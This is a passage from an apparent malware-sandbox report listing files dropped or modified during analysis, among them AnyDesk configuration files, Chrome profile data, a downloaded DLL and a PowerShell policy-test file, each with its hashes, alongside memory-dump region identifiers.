SHA1 f1cf190f8ca93000e56d49732e9e827e2554c46f
SHA256 6452273c017db7cbe0ffc5b109bbf3f8d3282fb91bfa3c5eabc4fb8f1fc98cb0
SHA512 6c414b39bbc1f1f08446c6c6da6f6e1ceb9303bbf183ae279c872d91641ea8d67ec5e5c4e0824da3837eca73ec29fe70e92b72c09458c8ce50fa6f08791d1492

memory/5432-406-0x0000000000730000-0x0000000001E79000-memory.dmp

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 5c7953f2ad2c6e38ce5be2510c81f5fe
SHA1 1f11f1ae5af4e48a41f53f2e606b4538ed92ca95
SHA256 bc6b690b6351bd24ce735f07655808b9b32dd561eff04301c2c376d5a2da4aa9
SHA512 670a3666dcd07d432da3099a1799526c7246dcbb3016ef782bc748daaecfd51a780d4899ea25c758413d6398eaa933c8801b77eeeefcdebe5a27e420e7b5aa21

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 04f7fe44298e8596cd3e408a42999509
SHA1 fa8b7754415d567ef6b31931fb9f712f2b7777ab
SHA256 7175cfa7516ee813571ff6b543fd82671939308d5689b173681b460d926f989c
SHA512 2aa9f772620b9b7e16a119df270b3a1bfefe1f5b9007417f8a577e1a4822e8d7a34a96454bfbcae71cf262c3adbf7408cac4413a8e2694ecbca0dd5e1a493562

C:\Users\Admin\AppData\Roaming\AnyDesk\service.conf

MD5 4518f83cf3ce2f596ac15e461c96d66e
SHA1 b8c8bef652c4cb910661c502c82f9975f5c94f9d
SHA256 9c5f0fbf6bd0dff62146016949b3b412bda8c178eae46da43c26c69af05d64d8
SHA512 761dd6e02453d250dacf86abd29c64e37ab354411c77f535b2ac6dd8fad467a62f72f0a71f6612e06c5b3a6cf6ca73ca49750d670bf3ff147b59e9b9312bb7df

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 a9f6a8d515c477eace1ec4967706b1be
SHA1 e4d25138e6c74fec504cb39ce1d685aa3c4ac384
SHA256 6f3bdc2657f9779020dfbd5ffc17bf69d55f1f181c5edb5ce2363c824e6380e5
SHA512 8a4b20c93a78bc8b9d377f43e9c4b06576ba264bde15836f60a64bd0fc7aedbcd3e9d44e3e77c6eea9c323e2a2e48b7795778f9cea6fef1c9a52b989fe6de180

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 91e3a8f520d6c20b12deed488f29183c
SHA1 78d14e02c059dca9e9ffddd7b4628421d14a85ac
SHA256 d7aa8a5a6ece1ecf484d68c4a7184a81178dd5fd19bed96a82130b075fe3019b
SHA512 0a3f108da11ee63ef02950c64e2f58ee9926214d38c4bdfc101396004a11c45bbc8295468e11fbded45b819080a4ad4fa4315c981f62655726690af095168730

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 dc027ffa2755dd867cca5b9023eff625
SHA1 ec3edab50fb60126a4b576a5545e8a46ab63307b
SHA256 bc0b965fa3aa8de3c4e5fd8ad3b33bc24a5f6987219c07a7128d6a313c4b71b9
SHA512 f61a67688b3da071f043b6c14e8c5f370a3b6ed3fe431abcc9b7d892f76bf25562cffb9350f6aebbdffc87856c9e726e8e54d18503b274d599aeb295b3d4c9d0

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 b461d1c54d043b805ac3dcb288c40eba
SHA1 7a4bd7d0a6f3c7057e11f34f479bc4d805380b8c
SHA256 d15ebff13dd4a3c806fe6e332517a7d27989dafac3d1a74a82ea45917b3372fd
SHA512 bb3da3c4174e24557630f5cf7b4c63c214cf82819248a85ef264ad4980133b06982d9af3d0fdf6b09112a02f78a871e47a8929a4b02bfa8d71fe1264037a3bc7

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 f0ed7f720d73b84759a519a4461e3914
SHA1 7e639aa6435ccaeae6ca675cb5f7eaaa291e2c47
SHA256 37aa604c44f3c9dd3905b9ee44a6b714fb8a3c17fa99be774053a0dcb74d88c3
SHA512 fb233a3cc7ab91e7e8e008d93fafb0999b19305ac7d18c7f539125da2f5aeaa1957a511133afc49f495d164874294014d1764cedaee0471c246dd8d0905ec589

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 4ac2ae7338c4d25160c51ba93b275365
SHA1 2bb69c106e5b0beb0f0c06328080e7162c56ff87
SHA256 13d445687aae20bb27efe2c58fdd98eff227d1494c5bcc4318919581f8cb22d8
SHA512 3807dd3b8bdb91b79960990d4a3de5df7bc6997d6b11dda8a374f09dd551779418247d677a9fe726c827f310448edf460adb084dc7b30876aff190da8925deef

C:\Users\Admin\AppData\Roaming\AnyDesk\service.conf

MD5 3e78c4d1523cd7b010f9e82cdcdd8639
SHA1 6278d992ca35c0ff8b4eb5dd22b7899a2c68e97d
SHA256 27e0cb5d4d9305d606f51319eda92b1fbfd49a62239362706ddeee6ce94d2d73
SHA512 82bc7156fc30991ae0d639ac6acff8521eed1af940e662c1a997854aa2fec707641411271c23ecd3825992ded6480e165bd75c79b61b9b5e1f1a7279c6c9414f

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 b3029695cf5daf87239c3453680afd5e
SHA1 9665e85e8adb80e765fca9b32d0ac7adbc34d7c3
SHA256 0d5a7b45fafaedf7156c847554bd31f70cb0aec67cc1c8a04494b68512689dc3
SHA512 2c788f7fcd00e7b971ab59b3a56ebc6c189c5cec2fe07e043e409e5d8146a6c79772e0180da558fa6f6911b20e511e31d01ec033a736e137fb6e6e4725171552

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 8a3b4fd5407fbbc36fa3983d792b6510
SHA1 19c5326e8150636d2ef888d0ae5096f3a1ac8e14
SHA256 e633075a28071980d27eca5dee7277e642aeb13eadeb8780c12f41f65331eef4
SHA512 5efdf6d81b50164699e8c0fa3d3562f97b06aaea7d7fe8b2c10e3d5c34e526e52c42d14883dddbd6802bd8239a58c84e246f1d6bd152f267317940dbd826e8ea

C:\Users\Admin\Downloads\gcapi.dll

MD5 1ce7d5a1566c8c449d0f6772a8c27900
SHA1 60854185f6338e1bfc7497fd41aa44c5c00d8f85
SHA256 73170761d6776c0debacfbbc61b6988cb8270a20174bf5c049768a264bb8ffaf
SHA512 7e3411be8614170ae91db1626c452997dc6db663d79130872a124af982ee1d457cefba00abd7f5269adce3052403be31238aecc3934c7379d224cb792d519753

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 968c9ebb40cf61e1ab051f07fe2f252a
SHA1 fe8564b63705fb650b9c58474197eb0864813993
SHA256 7e4cfa19f79fc1d39d2495e14edf38ddfca843f33e5ac4751ab625a4ceee3a65
SHA512 dd07eaab1cf54365bd5581cfc56d2369b849c3eb8d969ff76b37f0450e4941893a93b13932780637a0c83e4e79d9fcf1c9de883229d0c7969778aa6d3fa38eca

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 481233642ababaa88cb7366301a85f40
SHA1 8462743c76237d83acf280e0d7cf3310d75bc4a2
SHA256 5c637afd6b1ed942967b6b7098e62f268fa66a9162fa595223a7abaa40959fe1
SHA512 b0ae2d7ea55b6111a639708d22f8c94e70473b6a1b42f286df407f5f228a3f43bf46ce98fb120d57ace80a701059d306967f108a2f18e30efbd489acfcb35755

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 2792a4c06e1d3acc02b344e95fb68584
SHA1 5c217d5b8ac9f6aca44b83d086c10cc53c621b32
SHA256 0b0f12cd076c0678374fdabd0fad4e53202efa65b69cacdb1ddd9774cf9b4e74
SHA512 4602fc06e98fe0e9f1f82541e3c213cc4a0c8d7fd3329d171d71606263692d01f4ce8b8c0cc382b66f44317090c0b35a827bc8711bc70e708676013ecbd1c49c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe57c4c7.TMP

MD5 2e4daeaeb89c0ea20f34cda595ccf007
SHA1 a7abc53462a936d0a1ef79973dd9b0386625a5fd
SHA256 e9d706ce6349581dbed6d7d43fb15a5939c95fdf7552bef9fca1827be9488fa2
SHA512 4edd633de1a68e3d9d9202e9bb858a2823fff93c76361cf87641bbd49bba9632958a921d23e18e59de36d831dc5c8ef4f2c4ff5cce518280aca8aaf47e1ff046

memory/5236-652-0x0000000000730000-0x0000000001E79000-memory.dmp

memory/5420-653-0x0000000000730000-0x0000000001E79000-memory.dmp

memory/5432-654-0x0000000000730000-0x0000000001E79000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\ae689a2144e9e24bc49282f4757ca91c0bf7f5f1\index.txt

MD5 28ab3f17f42871cbdaef078637c39ca7
SHA1 a3a5cd994706c1be788bf147ae2c1b77eef6ebc2
SHA256 e665a5d8fd5c0877538a6faa84357d266c1a98745bd7984461a7e9b879f91c77
SHA512 10ae83d23f09d2e7d438dc419fffd7d0031af017559dc8f510b2642f362f9e7e2394f805ca21e5d885b831529eb051db379c7a0b7a03cfaeb79d58575e63ef56

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\ae689a2144e9e24bc49282f4757ca91c0bf7f5f1\index.txt~RFe57daef.TMP

MD5 ced9d3d7d1b90cb48f146387ee991efd
SHA1 602ab55a4b1d067e4deef047c9187a67e25ed758
SHA256 e7c37207b9e23923811ef6f69c87384b760a45d4144e71c431abdb1f6d30ad14
SHA512 bbdfdefa6a831069cd1a19d7fe3ba44d457d6aa629a756af3bbbe9cbf5abeb74e7e9a339cf70df10553a374dd47227f29a6f00c24de65f0564a699b724864a67

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 0edc9d4f0a8d300489d020d878354ed2
SHA1 36a658087232f5c5f4cef8dbd0fc4cf4563f1afd
SHA256 d5d49b50f980359b3685707fbeaac7ce326e566f2701cf539fc2d065342ec226
SHA512 8b25c2ea25189e423debd52312210d92ea97a2f995ece6e5eca496537694c0c6059e1528780d05fa21a489ffe03e84ffcfd74b214db255745dabdce48ca9a61f

memory/5420-676-0x0000000000730000-0x0000000001E79000-memory.dmp

memory/4224-679-0x0000000000730000-0x0000000001E79000-memory.dmp

C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

MD5 a9b43de053c4e4959c68bc7cbcb7930d
SHA1 872bdec87146eb63baf396442f04c172d74bb5d0
SHA256 22c61268f8e09bcb6bfb74115e17f1a5ae2ff679a92c390f4fa88de899e53f68
SHA512 d6e8d8f45a70a071d717ebe664d83f6672ce8fa6f3f438b0af5c7a69729c951ababccdc126128a34c7c09c061f9951a6c2ef549d4a9d6e4ffaed02a73cec00bb

memory/5236-686-0x0000000000734000-0x000000000196A000-memory.dmp

memory/5432-692-0x0000000000730000-0x0000000001E79000-memory.dmp

memory/5420-691-0x0000000000730000-0x0000000001E79000-memory.dmp

memory/4224-693-0x0000000000730000-0x0000000001E79000-memory.dmp

memory/5420-697-0x0000000000730000-0x0000000001E79000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 5d8e2c7f28de4a818d5ebbd2ec5cfbfb
SHA1 c43e2c089ec577e640b265441ae74e51fa1c2ae8
SHA256 f6b18ba2c13d4ed3c6c27b1fe8dbe41d8bccc6676f780cfb162b933a93606581
SHA512 bb29166b9658ad4b818596cb0f3155d0562316bd2efce2bc906b5e337f2622eaeca237e7cb03773f536c4a7411ad509c5b49f5ebc6124fde66f0fb2bb5c2f010

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000e

MD5 9f9aeeb1fb8a134a0adcfcdd0ea0b2d6
SHA1 146af5a42b22a4d5a25156843ea1f411a9d33351
SHA256 788a1a49e4e6fc2a7b04b8029c8a5c82bb3436b3687fe8dca4598a67bf7c481e
SHA512 c63f2fcd386ab9b4b74a5c71845b6cae63a21731e2dc11fd6364d354ae0bd9f73b07c7903ac086dbdd1dac4c40afb45332e85cdf5e6dc907072397ec6b3161d5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000022

MD5 793b00639d28cc98f2104dc9cdbae92e
SHA1 1b7910f7edc8c912d187a2fb0ff3288b3d4ec35e
SHA256 452667c50ec286cc16ae9a0a9b0da5d958c29d87044326d0459a38f27e34de4d
SHA512 6f4b8e105838a7bd57c917164c5c8fb2708e15a8670d750d8858cf448ef8f8319a79d66275bac640ff67badfb9cb4651a450934d456e0b82c933b498ccd97748

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00002f

MD5 1369e29c42f3a5aaa911ee70db581f63
SHA1 e70787f6560526bc803f5cfd101e9e1b20e0aeac
SHA256 7c8666debe140ba9cd1e65c78bb4b6e3c8fab0147e53a6d613c3510d97e2ffdd
SHA512 d82b6c032caba4d41c8a579346ffbe2f717dd46e8fcead9c81570c5fc277db209d416c3f8817d055ff675254c9d2fe65c2c348a39fae264ee5b244f0ffdd50af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00002b

MD5 25b091c60bef4d0992898c4d4eb707b9
SHA1 3d07cbf64a2be04fc8201fc93a95357eba6dabc3
SHA256 cc3d76d33cd07b8900c3742474a92f03e69583812b1a338e241c56123354ef6c
SHA512 5640594ddd3a61b307284e35e43d176e2238e38f2606b4ec3e202c439957cecfbb3505afa26747dafe9d77eeae97b6102489dfddaa98f689635b9107c90be536

memory/4224-716-0x0000000000730000-0x0000000001E79000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000074

MD5 1dbec9058e6648ad2db247dc40630ab8
SHA1 859b84a64908b7824cbdccd6aec7af122d53650f
SHA256 290ef1c5242d5b0a425f4bafd0dfe2ee8161b34e8a4aa602e6edd4d1ddbc3ef4
SHA512 341f34818959b9dc8a07c79821056c25d3489b81255d1f9b8999fdfde45bbb5ddb91cc7a51c0e922d72f78dc72c3c82c4ed8950f5c0ebab913fa4aedd38b4781

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00007e

MD5 87e8230a9ca3f0c5ccfa56f70276e2f2
SHA1 eb116c8fd20cb2f85b7a942c7dae3b0ed6d27fe7
SHA256 e18d7214e7d3d47d913c0436f5308b9296ca3c6cd34059bf9cbf03126bafafe9
SHA512 37690a81a9e48b157298080746aa94289a4c721c762b826329e70b41ba475bb0261d048f9ab8e7301e43305c5ebf53246c20da8cd001130bf156e8b3bd38b9b8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 ae1e03b07565ada541b1320547e3c1c0
SHA1 b2f988e95ad76377dff523b337479dc4bd6427f8
SHA256 0f4aebb23f671c452342874bf5080d127fec52ba224b56062bed4b0829f3716d
SHA512 8aae2a56d8ef593030bdaef722360d5b877caed8eeac8ea03cea6e1b860238ffad1e25b252380fec04041187484299b00614f8af32fe0793745e2b130df2c966

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 c76490fe7005d01645d8688ed67c9e74
SHA1 60d67f478a6a957ff7930d3eea88b2f47357d823
SHA256 efadf98d2affe5af0843816c17f4d30525aee6fd0de0855e3b05eae9fda25b29
SHA512 4e5381303f878c9a093bce6a4b7b8e1c00abbdd3c89d6b9b92827cfe1a2d365bf067111dfc8c0511560c5a58eda6a11f6a873d2f02ec62c14283582bbff3c504

memory/4224-1060-0x0000000000730000-0x0000000001E79000-memory.dmp

C:\Users\Admin\Downloads\Unconfirmed 949640.crdownload

MD5 908e05bcf942179e42cac3cc4f9545fe
SHA1 bef82438f0881d828c625066464ac814ab8485ab
SHA256 292cbf497b51fb90b770f93fd66d82c92eb82eb5ec87587d19129101c9282297
SHA512 537e8810f8bc5aa7b599c9b7aed2de208ea0a9ca6d47914e260c257929b7cff913bd9777743940c98a4592b2e84d3af807c4a507680062b5e6c0dfcb6c85bf23

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0000a7

MD5 3be2e9c4c58e18766801ef703a9161cc
SHA1 cbdc61e9fa2bd8c4293ea298a8aab94745e57f2d
SHA256 1c3f11c5ba6d3d5e0e1e88a3de6c27a16df13833470a19c03b04fb2f99dd5d57
SHA512 2f1a71f1fc17e79ddc1c0ba0be697fdc1641ee38604bd0c424b6ab702f008f9fd3c57f22ca959cea1f1de368016b258027190c279637ae8838787be366e40ec0

memory/5420-1223-0x0000000000730000-0x0000000001E79000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 588fce503ed694584dead16f36984c96
SHA1 6c1d66693c6c53a71b80b3cf92c02af79f7f79d9
SHA256 84c9feb1b6fa18fc91613d6f500c2a1e9b564a7857e57b7297d2d94cc562e805
SHA512 7b5619debea64b32e0cdfcc042a05f4ed674bb15faf700eff7f839f22eb50aa52e9fcd62e746e792775414f20d41923cd862ab9b1a910723e3339f0ca9d5d5a4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 a76421449c324dd82310095542de1623
SHA1 79ef1ef4aa512211f7a13ce6a6959c7589367db8
SHA256 e79bd95a917f39f8aaebfff0edbd8d00ffa1514069785bec948acbc965d3d433
SHA512 56ab1facfa73060e90747fa895db94d60e7024ec28bedaab965301f320e9d3375a8422ea1dc9e1cd404a31456935e89e6caba4fa780f9e00c5fe362a08048a76

memory/6184-1308-0x0000019EDEAD0000-0x0000019EDEAD1000-memory.dmp

memory/6184-1318-0x0000019EDEAD0000-0x0000019EDEAD1000-memory.dmp

memory/6184-1317-0x0000019EDEAD0000-0x0000019EDEAD1000-memory.dmp

memory/6184-1316-0x0000019EDEAD0000-0x0000019EDEAD1000-memory.dmp

memory/6184-1315-0x0000019EDEAD0000-0x0000019EDEAD1000-memory.dmp

memory/6184-1314-0x0000019EDEAD0000-0x0000019EDEAD1000-memory.dmp

memory/6184-1313-0x0000019EDEAD0000-0x0000019EDEAD1000-memory.dmp

memory/6184-1312-0x0000019EDEAD0000-0x0000019EDEAD1000-memory.dmp

memory/6184-1307-0x0000019EDEAD0000-0x0000019EDEAD1000-memory.dmp

memory/6184-1306-0x0000019EDEAD0000-0x0000019EDEAD1000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 719f7ec803e33d96bd85e22c0b1d9ca2
SHA1 159309cf67f81d660dab10087e2b4b09103befb8
SHA256 e29149a5e2fa7aceb27b4ee96707118a2da8f29e6989c74dbd90b3ced9628b8d
SHA512 cf2b3f9ef42836c6a53205f63f7150d034c128e951962d6f56bd336732718152c00f688b6dbb07fa13cd6e802e178ed074d95188d99590be34558b7abdfce9c9

memory/5420-1331-0x0000000000730000-0x0000000001E79000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 5a2ccf8cb25bafbcfe1e7e636c6036ee
SHA1 973d1507f28bf69858b75efbab585c2531af1d89
SHA256 0f56221319481bc146cbbe4357833d651ff42571a0305c7d08c5828e435ace0d
SHA512 4e4d5b92be845dfd2a1d0d0cdcb916688c14421760f5bf50deafbc3c5740a42a3610998f5709d97fa874b8345b56945773bea232c2cc598e1efa54bacae93054

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 4775375dc21dc0e556ba770b0bf8ce64
SHA1 7720c0a34492020778d5d0994549358e371b5662
SHA256 2de7399328c308d45eafbc73049e3d02366023c1aa2f81b695931d00306d1fb4
SHA512 97fe2cd3eb41e386dadc70953aab8bd7c48ecf3f83cebe70c0d5cffb412ff503c7de344c46d2c581eb933e682c90508dd5bcb1e3eaac50b55c9d76eba6604d47

memory/5420-1356-0x0000000000730000-0x0000000001E79000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007

MD5 87c2b09a983584b04a63f3ff44064d64
SHA1 8796d5ef1ad1196309ef582cecef3ab95db27043
SHA256 d4a4a801c412a8324a19f21511a7880815b373628e66016bc1785a5a85e0afb0
SHA512 df1f0d6f5f53306887b0b16364651bda9cdc28b8ea74b2d46b2530c6772a724422b33bbdcd7c33d724d2fd4a973e1e9dbc4b654c9c53981386c341620c337067

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000006

MD5 2280e0e4c8efa0f5fc1c10980425f5cf
SHA1 1d78ccb26fef7f1bf5bf29de100811e1ac8bda23
SHA256 b9225cb1f0df94ebe87b9eb2ad8c63cf664d2dfdb47aeaff785de6c7ce01aa74
SHA512 b759fcbf578947c0290ab703652df9f37abb1f9f5cf6140acaa8c4d4ee655ee0ee1f9bee9d4fd210d9e12585a51358b52e0e9c0878abf2713e6fd69a496ac624

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0000ae

MD5 4bdb35f3f515f0cf3044e6a9684843b1
SHA1 12c960465daf100b06c58c271420a6be3dc508ae
SHA256 b835bd77e17447a2dacfce2645a5e812733fe5a777a5e45d9daa56d28675cbef
SHA512 9fa600b87843759b632c2d384596109cf1fb149a5ab38524cf43cab5833cb25c355479aee90d60462764200108cde5ec71f0988504c97ad09e25975cac65bfe5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0000af

MD5 b9295fe93f7bb58d97cc858e302878a9
SHA1 34c6b1246cad4841aa1522cbd41146f9a547e8c5
SHA256 c0233c9b273aae7df532a992e710aaec409455b4b413b89a25854e9fb215c36c
SHA512 4c44ddbd35807653a60e2718dbd2ea85f09d7107b270045bcc2484e2a0ba977fbbb5739236ce7edb71d584c8f68df31fa3bdd03229eeace60c19662469adafc5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 51fc7ef8245807972dadb2bfa909ddbd
SHA1 1f9f2b6c1b1e37a6ba1be54524100fe9d8d3a3dc
SHA256 ddfd3f8c9d585f647c404d8be8fdec981c6ccc727f9c07b8350f6fbe71093329
SHA512 534b570e98bfa94b9f76674a40ced16a5aca9558b2faa3657f9f350652225ada8073e3e01898e0f6b4dd3d879bbdff1fed5183d723c168f25d382ab715202a6c

memory/5420-1482-0x0000000000730000-0x0000000001E79000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 90b0b26a4a4ece2e26521acb8e1d6225
SHA1 aeaae7b9f4e9c7ede60dfef22215dd4d098c160e
SHA256 452cecd0d9bab3b79ecf70858eebe30915e3594a4b971231170538f0dd047708
SHA512 fa479a92f644c348a6129c7ca266f3cc22c6180dcf51246f18293bc177e88ddb79417ddf0827e2b27baf6049848f04a3f5f265e103550a40e1dea2ae2df0f7df

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 367567379df130ffaaffb6c08ff7ff7e
SHA1 450f39fc14197afa7aa2464f7ce4c33565882f11
SHA256 c365aca6b484c35a0458f4eac70b9335231e16695e378de59190f72c66735501
SHA512 eb26cc7f49a50cc437d5ae4788f6d21485c07c546a863d82ded4422cc04fe5b9d94f4602ab3df975589e10b2580a618a435b3b1b7d7621c9d32d8fc6d5f14c49

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 b6f48def1ad0dc727f479ce8ffec8a6b
SHA1 488a3d7c23f20d7c90d9cd3010d31836d67b4028
SHA256 88b9c140ca5cdbc682401e0cd009ef606ef17510c596d69c12b629f720543aec
SHA512 ff657c31fa12c36894ac6002bbc33c3263739b9727aa255687ff9299087d47b2a6b390cd0bb6ce588b992c245e497f5e9178de97bec3c72a2d696160dd9f3a9a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe5908ff.TMP

MD5 ac53c3d701ac9d2262645a3b1e905fc7
SHA1 35a79d9bf820418b1a0a7f4892b4109e3eeda115
SHA256 b6065e2dd62a88a0920a471331b2024e26030cd42f13682941a5912bc9d9492d
SHA512 1e1e48bc1d9be3eb05d63c38a46a5b9fd864bd7f86ede84c26449a1a54a4a42b45ef101e31e457b9a4178fca624532ca4f20610017b780d7a98bb8f373ddf22a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 5fc396b91108dc4cfe4953766be6c2bf
SHA1 477298a9d75ae514b4e48a9d4ebe35a8c42a4b94
SHA256 69f3949ff14fc5768cf42551a5bfce489311ab94caec81d46f661bee9000b8ee
SHA512 d7e24db3323672e5432989b2f2d0dbe3fcfdce72031ae55ab4ac738041af44beccc0e3ea3b9042a6922f630a2da518e2ac23e76f1010b92491cb8785c9d047ee

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 2cbddb344d9bcd12f7e2876515e59a49
SHA1 71a4d42d7b015c3d659033a42d46da2accfda01f
SHA256 62b3ce8dc6eb0f92e71361fe01b555a6d558f1af604258a3763c2a8ae41b3718
SHA512 aca3c9ed90c9d76fbcea478a177738684eb7f62efc1e2da337527048a77e5ea5aeb0ea6bf35fbcdbbce71ab2ce68593a4220ab6aaadb95a88e64ea5897d38310

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 fb72bd2ab080b2379fb024ec91a798e7
SHA1 4158424ec7c4383dfa9f8963347315c30832472d
SHA256 08d0f4c106205144a920be4eafc79cb2adc30e331b91ec250d96db95f529b40f
SHA512 b93ed36940aa3f16719009f529ccf75238f7ed6da3e2eea4db3d2d0beeb32fa859f7faf114105e6fe6ce19f183cf471721954b3bab36d8a29bf8c2470b00da68

C:\Windows\Logs\DISM\dism.log

MD5 e7f634067f1b75b2cdfd1c0a0af14f16
SHA1 9a288835e111af8889379e4abe0a6053f9258c01
SHA256 8c5add1b9a9020f6e5148458db304902c7611d0fd128d4c2e4fdd8f8d60346a2
SHA512 6545210c954c6c7eb6da535b7c1ce88d04dafceedd003f79921319ddaddb4b3fcde4334bc23c5384eff311f0d13d365367f69a6a2ae04bbfe27ebd99c224fca1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 5fc41320cf9f32202d81616f206470e2
SHA1 77c2d04ca024a2d96be1a4c0b06f64cadb5a23c4
SHA256 817a478b9d3914d10ce9df09e801c9b3373093d0ea84ad6a172d65f13c383f7b
SHA512 70cf95fa38eb889be219613f3a5aef1502a417be840ceb31b0104697a8cb6d5e2a35ccf29a363f6d9ac889cded272e8e5711590d351e7e61425d7403c6c6235c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 901c40e584fd5fba344796f86a839acb
SHA1 8e8e2a3f99e8c062ebb081b50f9ba46a192ee165
SHA256 beaaa476783d69bca746bcd9a82f7ff0360eb8dd131fc9bc09008d87111b4adf
SHA512 19623014eebf6978b9d9b897f4d2c37fc2a96d03f63957fbe88abc76bff9d601cf3ee0d33a2e16156a84e526ec268f3bafc787e89f0c4ac2533adc3c408b55f6

memory/700-2418-0x0000000004AC0000-0x0000000004AF6000-memory.dmp

memory/700-2419-0x0000000005130000-0x0000000005758000-memory.dmp

memory/700-2420-0x00000000050B0000-0x00000000050D2000-memory.dmp

memory/700-2422-0x0000000005A70000-0x0000000005AD6000-memory.dmp

memory/700-2421-0x0000000005990000-0x00000000059F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o0patsd3.5rv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/700-2432-0x0000000005AE0000-0x0000000005E34000-memory.dmp

memory/700-2433-0x0000000006030000-0x000000000604E000-memory.dmp

memory/700-2434-0x0000000006080000-0x00000000060CC000-memory.dmp

memory/700-2446-0x0000000006620000-0x000000000663E000-memory.dmp

memory/700-2436-0x000000006D760000-0x000000006D7AC000-memory.dmp

memory/700-2435-0x0000000007200000-0x0000000007232000-memory.dmp

memory/700-2447-0x0000000007240000-0x00000000072E3000-memory.dmp

memory/700-2449-0x0000000007380000-0x000000000739A000-memory.dmp

memory/700-2448-0x00000000079C0000-0x000000000803A000-memory.dmp

memory/700-2450-0x00000000073F0000-0x00000000073FA000-memory.dmp

memory/700-2451-0x0000000007600000-0x0000000007696000-memory.dmp

memory/700-2452-0x0000000007580000-0x0000000007591000-memory.dmp

memory/700-2453-0x00000000075C0000-0x00000000075CE000-memory.dmp

memory/700-2454-0x00000000076A0000-0x00000000076BA000-memory.dmp

memory/2800-2465-0x0000000005A00000-0x0000000005D54000-memory.dmp

memory/2800-2470-0x000000006D760000-0x000000006D7AC000-memory.dmp

memory/5768-2490-0x00000000060D0000-0x0000000006424000-memory.dmp

memory/5768-2495-0x000000006D760000-0x000000006D7AC000-memory.dmp

F:\LDPlayer\LDPlayer9\ldmutiplayer\msvcr110.dll

MD5 4ba25d2cbe1587a841dcfb8c8c4a6ea6
SHA1 52693d4b5e0b55a929099b680348c3932f2c3c62
SHA256 b30160e759115e24425b9bcdf606ef6ebce4657487525ede7f1ac40b90ff7e49
SHA512 82e86ec67a5c6cddf2230872f66560f4b0c3e4c1bb672507bbb8446a8d6f62512cbd0475fe23b619db3a67bb870f4f742761cf1f87d50db7f14076f54006f6c6

F:\LDPlayer\ldmutiplayer\fonts\Roboto-Regular.otf

